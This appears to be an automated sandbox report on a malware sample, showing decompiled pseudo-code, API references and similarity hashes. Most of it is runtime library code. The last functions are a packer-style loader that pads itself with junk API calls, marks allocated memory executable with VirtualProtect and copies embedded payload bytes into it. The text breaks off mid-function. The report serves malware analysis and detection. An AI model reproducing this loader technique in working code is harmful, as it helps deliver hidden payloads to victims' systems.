				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E004169EE(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E004169EE(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00414348(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E0041427B(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00416CEA(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E0041D1C9(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t82 = _t97 + 8;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x0041710f
0x0041710f
0x00417116
0x0041711f
0x0041723e
0x00417125
0x00417127
0x00417131
0x00417134
0x0041713a
0x00417144
0x00417169
0x0041716e
0x00417173
0x0041723a
0x00000000
0x0041723b
0x00417173
0x00417144
0x00417179
0x0041717c
0x0041717f
0x00417185
0x0041718b
0x0041719d
0x004171a2
0x004171a5
0x004171a8
0x004171ab
0x004171ae
0x004171b4
0x004171ba
0x004171bd
0x004171c0
0x004171cf
0x004171d0
0x004171d0
0x004171d5
0x004171e8
0x004171ea
0x004171ef
0x004171fa
0x004171fc
0x004171fe
0x0041721a
0x0041721f
0x00417222
0x00417222
0x004171fa
0x004171ef
0x00417228
0x00417229
0x0041722c
0x0041722f
0x00417232
0x00417235
0x004171c0
0x00000000
0x004171b4
0x0041723f
0x00417244
0x00417248
0x0041724b
0x0041724c
0x0041724d
0x0041724e
0x00417253
0x004172cb
0x004172cd
0x00417255
0x00417255
0x0041725b
0x00000000
0x0041725d
0x00417260
0x00417263
0x0041726a
0x0041726d
0x00417271
0x004172a3
0x004172a6
0x004172ad
0x004172b3
0x004172bd
0x004172c6
0x004172c6
0x004172bd
0x004172b3
0x004172c7
0x00417273
0x00417273
0x00417276
0x00417276
0x0041727a
0x00000000
0x00000000
0x0041727e
0x00417292
0x00417292
0x00417280
0x00417280
0x00417286
0x00000000
0x00417288
0x00417288
0x0041728b
0x00417290
0x00000000
0x00000000
0x00000000
0x00000000
0x00417290
0x00417286
0x0041729b
0x0041729d
0x00000000
0x0041729f
0x0041729f
0x0041729f
0x00000000
0x0041729d
0x00417296
0x00417298
0x00000000
0x00417298
0x00000000
0x00000000
0x00000000
0x00417263
0x0041725b
0x004172ce
0x004172d2
0x004172d2

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00417134

Strings

MOC, xrefs: 00417146
RCC, xrefs: 0041714E

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 2a40fb4bdf83400d2650afdc796ba9e505080c47c9f2870ea470e087ecee65f9
Instruction ID: d458f8df66f3d856a3ef55368f4534f47102a0e82d5f8415460ec7bf2e3ef8d2
Opcode Fuzzy Hash: 2a40fb4bdf83400d2650afdc796ba9e505080c47c9f2870ea470e087ecee65f9
Instruction Fuzzy Hash: 7A417C71900209AFCF16DF98CD81AEEBBB5FF48304F15819AF904A7211D339D991DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00407040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00407040(intOrPtr* __ecx, void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				intOrPtr _t51;
				intOrPtr* _t52;
				intOrPtr _t53;
				intOrPtr* _t54;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t57;
				intOrPtr* _t60;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr* _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr* _t73;
				void* _t75;
				intOrPtr _t76;
				intOrPtr* _t77;
				signed int _t79;

				_push(0xffffffff);
				_push(0x4319d0);
				_push( *[fs:0x0]);
				_push(_t56);
				_push(_t75);
				_push(_t72);
				_t45 =  *0x443048; // 0x35200185
				_push(_t45 ^ _t79);
				 *[fs:0x0] =  &_v16;
				_v20 = __ecx;
				_v28 = __ecx;
				_v28 = __ecx;
				 *__ecx = 0x43e9d0;
				_t76 = E0041362C(_t56, _t72, _t75, __eflags, 8);
				asm("xorps xmm0, xmm0");
				asm("movq [esi], xmm0");
				_push(1);
				_v8 = 0;
				 *((intOrPtr*)(_t76 + 4)) = E00412660(_t56, _t72, _t76, __eflags);
				_t51 = _v20;
				_t66 = _t51 + 0x18;
				_t70 = _t51 + 0x24;
				_t73 = _t51 + 0x14;
				 *((intOrPtr*)(_t51 + 0x34)) = _t76;
				_t57 = _t51 + 4;
				 *((intOrPtr*)(_t51 + 0xc)) = _t57;
				_t77 = _t51 + 8;
				 *((intOrPtr*)(_t51 + 0x20)) = _t66;
				 *((intOrPtr*)(_t51 + 0x2c)) = _t70;
				 *((intOrPtr*)(_t51 + 0x10)) = _t77;
				 *((intOrPtr*)(_t51 + 0x1c)) = _t73;
				_t52 = _t51 + 0x28;
				_v24 = _t57;
				_v28 = _t52;
				 *((intOrPtr*)(_v20 + 0x30)) = _t52;
				 *_t77 = 0;
				 *_t66 = 0;
				 *_t52 = 0;
				_t53 = _v20;
				 *_v24 = 0;
				_t60 = _v20;
				 *_t73 = 0;
				 *_t70 = 0;
				 *((intOrPtr*)(_t53 + 0x20)) = _t66;
				 *_t60 = 0x43ea30;
				 *((char*)(_t60 + 0x48)) = 0;
				 *((char*)(_t60 + 0x3d)) = 0;
				 *((intOrPtr*)(_t53 + 0xc)) = _v24;
				 *((intOrPtr*)(_t53 + 0x2c)) = _t70;
				 *((intOrPtr*)(_t53 + 0x10)) = _t77;
				 *((intOrPtr*)(_t53 + 0x1c)) = _t73;
				_t54 = _v28;
				 *((intOrPtr*)(_v20 + 0x30)) = _t54;
				 *_t77 = 0;
				 *_t66 = 0;
				_t67 =  *0x444f50; // 0x0
				 *_t54 = 0;
				_t55 = _v20;
				 *_v24 = 0;
				 *_t73 = 0;
				 *_t70 = 0;
				_t71 =  *0x444f54; // 0x0
				 *((intOrPtr*)(_t55 + 0x4c)) = 0;
				 *((intOrPtr*)(_t55 + 0x40)) = _t67;
				 *((intOrPtr*)(_t55 + 0x44)) = _t71;
				 *((intOrPtr*)(_t55 + 0x38)) = 0;
				 *[fs:0x0] = _v16;
				return _t55;
			}

0x00407043
0x00407045
0x00407050
0x00407054
0x00407055
0x00407056
0x00407057
0x0040705e
0x00407062
0x0040706a
0x0040706d
0x00407072
0x00407075
0x00407080
0x00407082
0x00407085
0x00407089
0x0040708b
0x00407097
0x0040709d
0x004070a0
0x004070a3
0x004070a6
0x004070a9
0x004070ac
0x004070af
0x004070b2
0x004070b5
0x004070b8
0x004070bb
0x004070be
0x004070c1
0x004070c4
0x004070ca
0x004070cd
0x004070d3
0x004070d9
0x004070df
0x004070e5
0x004070e8
0x004070ee
0x004070f1
0x004070f7
0x004070fd
0x00407100
0x00407106
0x0040710a
0x00407111
0x00407117
0x0040711a
0x0040711d
0x00407120
0x00407123
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407141
0x00407144
0x0040714a
0x00407150
0x00407156
0x0040715c
0x00407163
0x00407166
0x00407169
0x00407173
0x00407181

APIs

std::locale::_Init.LIBCPMT ref: 00407092

Part of subcall function 00412660: __EH_prolog3.LIBCMT ref: 00412667
Part of subcall function 00412660: std::_Lockit::_Lockit.LIBCPMT ref: 00412672
Part of subcall function 00412660: std::locale::_Setgloballocale.LIBCPMT ref: 0041268D
Part of subcall function 00412660: _Yarn.LIBCPMT ref: 004126A3
Part of subcall function 00412660: std::_Lockit::~_Lockit.LIBCPMT ref: 004126E3

Strings

P_@, xrefs: 00407075
_@, xrefs: 00407100

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
String ID: _@$P_@
API String ID: 3852638621-4293464667
Opcode ID: 5eacaf69455bbf3adc1bac80b9a36896f5fa2a1439a21d4e39757576f9f38aa9
Instruction ID: 7be0e8f9f6de9a8e6829aca24daf0f72573013ab6ac6fb37b57ee9c761daf7a2
Opcode Fuzzy Hash: 5eacaf69455bbf3adc1bac80b9a36896f5fa2a1439a21d4e39757576f9f38aa9
Instruction Fuzzy Hash: 8B41D5B4900315CFD740CF59D990B9ABBF4FF09310F1145AAD908AB3A2E3B99944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004126F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 34%

			E004126F0(void* __ecx, void* __esi, intOrPtr _a4) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr* _t18;
				intOrPtr* _t21;
				intOrPtr _t25;
				signed int _t37;

				_push(__ecx);
				_push(__ecx);
				_t25 = _a4;
				E0041247D( &_v12, 0);
				_t37 =  *(_t25 + 0xc);
				if(_t37 == 0) {
					L7:
					E0041AC1E( *((intOrPtr*)(_t25 + 8)));
					return E004124D5( &_v12);
				}
				do {
					_t37 = _t37 - 1;
					_t18 =  *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + _t37 * 4));
					_v8 = _t18;
					if(_t18 != 0) {
						 *0x4331a4();
						_t21 =  *((intOrPtr*)( *((intOrPtr*)( *_t18 + 8))))();
						_v8 = _t21;
						if(_t21 != 0) {
							 *0x4331a4(1);
							 *((intOrPtr*)( *((intOrPtr*)( *_t21))))();
						}
					}
				} while (_t37 != 0);
				goto L7;
			}

0x004126f3
0x004126f4
0x004126f6
0x004126ff
0x00412704
0x00412709
0x0041274b
0x0041274e
0x0041275f
0x0041275f
0x0041270c
0x0041270f
0x00412710
0x00412713
0x00412718
0x00412721
0x0041272a
0x0041272c
0x00412731
0x0041273b
0x00412744
0x00412744
0x00412731
0x00412746
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004126FF
std::_Lockit::~_Lockit.LIBCPMT ref: 00412757

Strings

0'@, xrefs: 00412721, 0041273B

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: 0'@
API String ID: 593203224-1999884151
Opcode ID: de1483b12276fc6f5eb4b011178078128f1061385cc6e76926f2bf0edf41edee
Instruction ID: 6fd8943e669119d7ec51c0b49802595411a9acec9e5ce50be34f68a5b4cfed9f
Opcode Fuzzy Hash: de1483b12276fc6f5eb4b011178078128f1061385cc6e76926f2bf0edf41edee
Instruction Fuzzy Hash: C4014C35600505EFCB05DF55CA95D9ABBB5AF84710B14409AE9059B3A1EFB0EE80CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414B7B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 16%

			E00414B7B(intOrPtr* _a4, signed char* _a8) {
				signed char* _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr* _t15;
				DWORD* _t17;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr* _t23;
				signed char* _t25;
				void* _t26;

				_t15 = _a4;
				_t25 = _a8;
				_t21 = 0x19930520;
				_v20 = _t15;
				if(_t25 == 0) {
					L5:
					_t10 =  &_v20; // 0x4123ef
					_v12 =  *_t10;
					_t17 =  &_v16;
					_v16 = _t21;
					_v8 = _t25;
					RaiseException(0xe06d7363, 1, 3, _t17);
					return _t17;
				}
				if(( *_t25 & 0x00000010) == 0) {
					L3:
					if(( *_t25 & 0x00000008) != 0) {
						_t21 = 0x1994000;
					}
					goto L5;
				}
				_t23 =  *_t15 - 4;
				_t18 =  *_t23;
				_t6 = _t18 + 0x20; // 0x0
				_t7 = _t18 + 0x18; // 0x4418ec
				_t25 =  *_t7;
				 *0x4331a4(_t23, _t26);
				 *((intOrPtr*)( *_t6))();
				if(_t25 == 0) {
					goto L5;
				}
				goto L3;
			}

0x00414b81
0x00414b86
0x00414b89
0x00414b8e
0x00414b93
0x00414bc2
0x00414bc2
0x00414bc5
0x00414bc8
0x00414bd5
0x00414bd8
0x00414bdb
0x00414be4
0x00414be4
0x00414b98
0x00414bb8
0x00414bbb
0x00414bbd
0x00414bbd
0x00000000
0x00414bbb
0x00414b9c
0x00414ba1
0x00414ba3
0x00414ba8
0x00414ba8
0x00414bab
0x00414bb1
0x00414bb6
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,004123EF,?,00441908,00402904,string too long,00402904,?,?,?), ref: 00414BDB

Strings

0'@, xrefs: 00414BAB
#A, xrefs: 00414BC2

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ExceptionRaise
String ID: 0'@$#A
API String ID: 3997070919-2128406668
Opcode ID: 4448a2e252afef4bf1126883b95734932f5fca6c41fa96ffda61e212ad3e9f0e
Instruction ID: effdd90de390f4434539d58b8c5eaf0cb76ce4bbf9f056b46b12c201dad2b2f8
Opcode Fuzzy Hash: 4448a2e252afef4bf1126883b95734932f5fca6c41fa96ffda61e212ad3e9f0e
Instruction Fuzzy Hash: DA01A275A00208AFCB059F68D980B9EBBF8FF84710F15415AEA55AB390D770EE40CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 004234AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E004234AC(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				intOrPtr* _t11;

				_t11 = E0042319F(0xe, "InitializeCriticalSectionEx", 0x437378, 0x437380);
				if(_t11 == 0) {
					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
				}
				 *0x4331a4(_a4, _a8, _a12);
				return  *_t11();
			}

0x004234c8
0x004234cf
0x00000000
0x004234ec
0x004234dc
0x00000000

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00421CE3,-00000020,00000FA0,00000000,00000002,00000040,?,35200185), ref: 004234EC

Strings

0'@, xrefs: 004234DC
InitializeCriticalSectionEx, xrefs: 004234BC

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: 0'@$InitializeCriticalSectionEx
API String ID: 2593887523-1065118902
Opcode ID: 21c627221255b91780c5cf942384412f78e7e91c2c5f48854221c6c00cb33873
Instruction ID: 15c8f457bd513b11090f3eb9096ea7fe53204c1ecbb00c72ce381f777ba775fd
Opcode Fuzzy Hash: 21c627221255b91780c5cf942384412f78e7e91c2c5f48854221c6c00cb33873
Instruction Fuzzy Hash: D4E09232684228B7CF222F51DC06E9E7F21EB047A2F448122FD0815160CABE8A20E6C8

Uniqueness

Uniqueness Score: -1.00%

Function 00423332 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00423332(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t7;

				_t7 = E0042319F(0x1e, "FlsAlloc", 0x437418, 0x437420);
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0x4331a4(_a4);
				return  *_t7();
			}

0x0042334e
0x00423355
0x00000000
0x00423366
0x0042335c
0x00000000

APIs

TlsAlloc.KERNEL32 ref: 00423366

Strings

0'@, xrefs: 0042335C
FlsAlloc, xrefs: 00423342

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Alloc
String ID: 0'@$FlsAlloc
API String ID: 2773662609-3437125672
Opcode ID: d0521f316c186076e85c0e7d99fd5a43a8ed6391bc7b8b5742bd1b257a1712c1
Instruction ID: e6d9a41c36321a43309d7c432a8ff7bc219acdd39542b85e451266cd1ef2c48d
Opcode Fuzzy Hash: d0521f316c186076e85c0e7d99fd5a43a8ed6391bc7b8b5742bd1b257a1712c1
Instruction Fuzzy Hash: C0E07231B8023877C6203E60AC0AA9EBE24CB08BB3F400033FE00112808EAD0B1096ED

Uniqueness

Uniqueness Score: -1.00%

Function 0041E40D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E40D() {

				 *0x444afc = GetCommandLineA();
				 *0x444b00 = GetCommandLineW();
				return 1;
			}

0x0041e413
0x0041e41e
0x0041e425

APIs

GetCommandLineA.KERNEL32 ref: 0041E40D
GetCommandLineW.KERNEL32 ref: 0041E418

Strings

P3i, xrefs: 0041E413

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: CommandLine
String ID: P3i
API String ID: 3253501508-1408781166
Opcode ID: de68ca8399ab76325e372adec481eb7b76d557d3fe888c1639c3f485e1507bfe
Instruction ID: 70c23cb0090479d647e0fb3c3e77e38a403cf0719dc92b4d7b37de3ce0558119
Opcode Fuzzy Hash: de68ca8399ab76325e372adec481eb7b76d557d3fe888c1639c3f485e1507bfe
Instruction Fuzzy Hash: 6BB048BCC002008BCB008F62B8192843BA0B28960338064B5D42182621DB384900DF28

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: beiruttPID: 2236, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	16.9%
Signature Coverage:	2.4%
Total number of Nodes:	1629
Total number of Limit Nodes:	19

Executed Functions

Function 00403A3E Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 83
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00403A3E(void* __ecx, void* __fp0) {
				short _v2052;
				char _v3076;
				void* __ebp;
				intOrPtr _t7;
				intOrPtr _t8;
				intOrPtr* _t24;
				intOrPtr* _t26;
				void* _t28;
				void* _t30;
				signed int _t35;
				void* _t37;
				intOrPtr* _t38;
				void* _t42;

				_t42 = __fp0;
				_t28 = __ecx;
				_t37 = (_t35 & 0xfffffff8) - 0xc00;
				if( *0x42a074 == 0x20) {
					FoldStringW(0, L"neyijabizux", 0,  &_v2052, 0);
					__imp__GetConsoleAliasExesA(0);
					FindResourceExW(0, 0, 0, 0);
					CreateWaitableTimerA(0, 0, 0);
					SetConsoleActiveScreenBuffer(0);
					GetPriorityClass(0);
					EndUpdateResourceW(0, 0);
					GetDevicePowerState(0, 0);
					SetCaretPos(0, 0);
					E00403C3B(_t28, 0, 0);
					E00403BAD();
					_t38 = _t37 + 0xc;
					E00403C3B(_t28, 0, 0);
					_t24 = _t38;
					 *_t24 = 0;
					 *((intOrPtr*)(_t24 + 4)) = 0;
					E00402FA8(__fp0, 0,  &_v3076);
					st0 = _t42;
					_t26 = _t38;
					 *_t26 = 0;
					 *((intOrPtr*)(_t26 + 4)) = 0;
					E00402F85(_t42, _t28, _t28);
					st0 = _t42;
				}
				_t30 = 0x4f4;
				do {
					GetMenuItemID(0, 0);
					LoadMenuA(0, 0);
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				_t7 =  *0x4131cc; // 0xfff61955
				 *0x42a074 = _t7;
				_t8 =  *0x41222c; // 0x360a55
				 *0x42a078 = _t8; // executed
				E004031F1(_t42); // executed
				return 0;
			}

0x00403a3e
0x00403a3e
0x00403a44
0x00403a55
0x00403a6b
0x00403a77
0x00403a81
0x00403a8a
0x00403a91
0x00403a98
0x00403aa0
0x00403aa8
0x00403ab0
0x00403ab8
0x00403abe
0x00403ac3
0x00403ac8
0x00403acd
0x00403acf
0x00403ad1
0x00403ad4
0x00403ad9
0x00403add
0x00403adf
0x00403ae1
0x00403ae4
0x00403ae9
0x00403ae9
0x00403aeb
0x00403af0
0x00403af2
0x00403afa
0x00403b00
0x00403b00
0x00403b03
0x00403b08
0x00403b0d
0x00403b12
0x00403b17
0x00403b23

APIs

FoldStringW.KERNEL32(00000000,neyijabizux,00000000,?,00000000), ref: 00403A6B
GetConsoleAliasExesA.KERNEL32(00000000,00000000), ref: 00403A77
FindResourceExW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403A81
CreateWaitableTimerA.KERNEL32 ref: 00403A8A
SetConsoleActiveScreenBuffer.KERNEL32(00000000), ref: 00403A91
GetPriorityClass.KERNEL32(00000000), ref: 00403A98
EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 00403AA0
GetDevicePowerState.KERNEL32(00000000,00000000), ref: 00403AA8
SetCaretPos.USER32(00000000,00000000), ref: 00403AB0
_calloc.LIBCMT ref: 00403AB8

Part of subcall function 00403C3B: __calloc_impl.LIBCMT ref: 00403C50

Part of subcall function 00403BAD: __lock.LIBCMT ref: 00403BCB
Part of subcall function 00403BAD: ___sbh_find_block.LIBCMT ref: 00403BD6
Part of subcall function 00403BAD: ___sbh_free_block.LIBCMT ref: 00403BE5
Part of subcall function 00403BAD: HeapFree.KERNEL32(00000000,?,0040F340,0000000C,0040468B,00000000,0040F3C8,0000000C,004046C5,?,?,?,0040540D,00000004,0040F3E8,0000000C), ref: 00403C15
Part of subcall function 00403BAD: GetLastError.KERNEL32(?,0040540D,00000004,0040F3E8,0000000C,00405AA2,?,?,00000000,00000000,00000000,?,00405723,00000001,00000214), ref: 00403C26

_calloc.LIBCMT ref: 00403AC8

Part of subcall function 00402FA8: __floor_pentium4.LIBCMT ref: 00402FBA

Part of subcall function 00402F85: _fabs.LIBCMT ref: 00402F97

GetMenuItemID.USER32(00000000,00000000), ref: 00403AF2
LoadMenuA.USER32 ref: 00403AFA

Strings

neyijabizux, xrefs: 00403A65
U6, xrefs: 00403B0D

Memory Dump Source

Source File: 00000007.00000002.572696263.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.572660674.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572866987.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.572886161.0000000000412000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573058769.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.573105153.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_beirutt.jbxd

Similarity

API ID: ConsoleMenuResource_calloc$ActiveAliasBufferCaretClassCreateDeviceErrorExesFindFoldFreeHeapItemLastLoadPowerPriorityScreenStateStringTimerUpdateWaitable___sbh_find_block___sbh_free_block__calloc_impl__floor_pentium4__lock_fabs
String ID: U6$neyijabizux
API String ID: 1119798730-3202033519
Opcode ID: 1ffbfa4a6ab95df5fd44c8aef9e2fa6455bae1a02d950762fb7864f48887af39
Instruction ID: 86aacee0df90e37b13d1b6879df53be8350606017091121854f65233f0280c4c
Opcode Fuzzy Hash: 1ffbfa4a6ab95df5fd44c8aef9e2fa6455bae1a02d950762fb7864f48887af39
Instruction Fuzzy Hash: F5212171502524BBC3216F65AE0DDCB3EACEF0A7517004136F949E21A1D7785642CBFE

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1 Relevance: 73.9, APIs: 29, Strings: 13, Instructions: 398
memorylibrarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E004031F1(void* __fp0) {
				void* _t371;
				struct HINSTANCE__* _t390;
				intOrPtr* _t491;
				void* _t497;
				void* _t499;
				void* _t533;
				void* _t534;
				void* _t535;
				void* _t536;
				void* _t543;
				void* _t544;
				void* _t547;
				intOrPtr* _t548;
				void* _t572;

				_t572 = __fp0;
				E0040E378(E0040F314, _t543);
				_t548 = _t547 - 0x924;
				_push(_t543);
				if( *0x42a074 == 0x66) {
					E00403B26(_t548 + 0x110, _t497);
					 *((intOrPtr*)(_t548 + 0x940)) = 0;
					E00403EF1(0);
					E00403EF1(0);
					_pop(_t503);
					E00403DA2(0, 0);
					_t491 = _t548;
					 *_t491 = 0;
					 *((intOrPtr*)(_t491 + 4)) = 0;
					E00402F85(__fp0);
					st0 = _t572;
					E00404261(0);
				}
				 *0x42a074 =  *0x42a074 + 0xb2d3b;
				 *0x429ec8 = LoadLibraryW(L"kernel32.dll"); // executed
				_t371 = GlobalAlloc(0,  *0x42a074); // executed
				 *0x429e3c = _t371;
				VirtualProtect(_t371,  *0x42a074, 0x40, _t548 + 0x1c); // executed
				_t533 = 0;
				if( *0x42a074 > 0) {
					do {
						 *((char*)( *0x429e3c + _t533)) =  *((intOrPtr*)( *0x42a078 + _t533 + 0xb2d3b));
						if( *0x42a074 == 0x67a) {
							HeapSize(0, 0, 0);
						}
						_t533 = _t533 + 1;
					} while (_t533 <  *0x42a074);
				}
				_t534 = 0;
				do {
					if( *0x42a074 + _t534 == 0x5e) {
						CreateFiber(0, 0, 0);
						__imp__GetConsoleAliasA(0, _t548 + 0x134, 0, 0);
						LCMapStringA(0, 0, 0, 0, _t548 + 0x530, 0);
						GetCPInfo(0, _t548 + 0x110);
						GetNamedPipeInfo(0, 0, 0, 0, 0);
						lstrlenA("nusarifubanuwedike");
					}
					_t534 = _t534 + 1;
				} while (_t534 < 0x40c893);
				_t535 = 0;
				while(1) {
					GetCommMask(0, 0); // executed
					SetLastError(0);
					__imp__GetConsoleProcessList(0, 0);
					if(_t535 < 0x26d92a) {
						 *((intOrPtr*)(_t548 + 0x38)) = 0x127fe718;
						 *((intOrPtr*)(_t548 + 0x44)) = 0xe73c505;
